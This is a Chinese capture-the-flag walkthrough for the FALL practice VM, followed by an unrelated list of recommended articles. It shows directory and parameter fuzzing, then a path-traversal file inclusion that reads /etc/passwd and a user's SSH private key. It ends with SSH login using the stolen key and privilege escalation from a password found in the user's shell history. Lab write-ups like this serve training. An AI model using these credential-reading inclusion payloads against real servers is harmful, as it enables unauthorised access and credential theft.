FALL靶机渗透攻略

1.安装并开启靶机

2.获取靶机IP

将靶机和Kali都设置为NAT模式

3.访问靶机地址

4.扫描目录和端口

gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

5.访问敏感文件

提示缺少GET参数

爆破参数

wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd

尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,

我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa

http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa

将私钥保存到Kali中,用私钥登录

chmod 400 id_rsa

ssh [email protected] -i id_rsa

6.提权

查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE

sudo su

相关推荐
CYRUS_STUDIO34 分钟前
一文搞懂 SO 脱壳全流程:识别加壳、Frida Dump、原理深入解析
android·安全·逆向
Bruce_Liuxiaowei36 分钟前
深度剖析OpenSSL心脏滴血漏洞与Struts2远程命令执行漏洞
struts·安全·web安全
Orlando cron3 小时前
Kubernetes 网络模型深度解析:Pod IP 与 Service 的负载均衡机制,Service到底是什么?
网络·tcp/ip·kubernetes
科技小E4 小时前
打手机检测算法AI智能分析网关V4守护公共/工业/医疗等多场景安全应用
人工智能·安全·智能手机
行云流水剑6 小时前
【学习记录】使用 Kali Linux 与 Hashcat 进行 WiFi 安全分析:合法的安全测试指南
linux·学习·安全
KKKlucifer6 小时前
加密通信 + 行为分析:运营商行业安全防御体系重构
网络·安全·重构
炎码工坊7 小时前
微服务通信安全实战:JWT在分布式架构中的应用与最佳实践
安全·网络安全·云原生·系统安全·安全架构
achene_ql9 小时前
select、poll、epoll 与 Reactor 模式
linux·服务器·网络·c++
黎相思9 小时前
应用层自定义协议与序列化
运维·服务器·网络
Lightning-py11 小时前
Linux命令cat /proc/net/snmp查看网络协议层面统计信息
网络·网络协议·tcp/ip